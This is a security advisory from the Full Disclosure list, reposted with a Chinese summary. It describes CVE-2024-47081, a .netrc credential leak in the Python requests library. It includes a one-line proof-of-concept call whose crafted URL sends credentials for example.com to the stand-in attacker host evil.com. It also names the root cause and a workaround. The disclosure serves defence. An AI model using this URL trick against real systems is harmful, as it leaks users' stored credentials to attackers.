CVE-2024-47081: Netrc credential leak in PSF requests library
Python软件基金会(PSF)的requests库存在安全漏洞CVE-2024-47081,在处理特定URL时会泄露用户的.netrc凭证至第三方网站。该问题源于URL解析错误,尚未修复。 2025-6-3 13:0:20 Author: seclists.org(查看原文) 阅读量:28 收藏
fulldisclosure logo

Full Disclosure mailing list archives

From: Juho Forsén via Fulldisclosure <fulldisclosure () seclists org>
Date: Sat, 31 May 2025 06:30:50 +0000
The PSF requests library (https://github.com/psf/requests & https://pypi.org/project/requests/) leaks .netrc 
credentials to third parties due to incorrect URL processing under specific conditions.

Issuing the following API call triggers the vulnerability:

  requests.get('http://example.com:@evil.com/&apos;)

Assuming .netrc credentials are configured for example.com, they are leaked to evil.com by the call.

The root cause is 
https://github.com/psf/requests/blob/c65c780849563c891f35ffc98d3198b71011c012/src/requests/utils.py#L240-L245

The vulnerability was originally reported to the library maintainers on September 12, 2024, but no fix is available. 
CVE-2024-47081 has been reserved by GitHub for this issue.

As a workaround, clients may explicitly specify the credentials used on every API call to disable .netrc access.
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

Current thread:

  • CVE-2024-47081: Netrc credential leak in PSF requests library Juho Forsén via Fulldisclosure (Jun 03)

文章来源: https://seclists.org/fulldisclosure/2025/Jun/2
如有侵权请联系:admin#unsafe.sh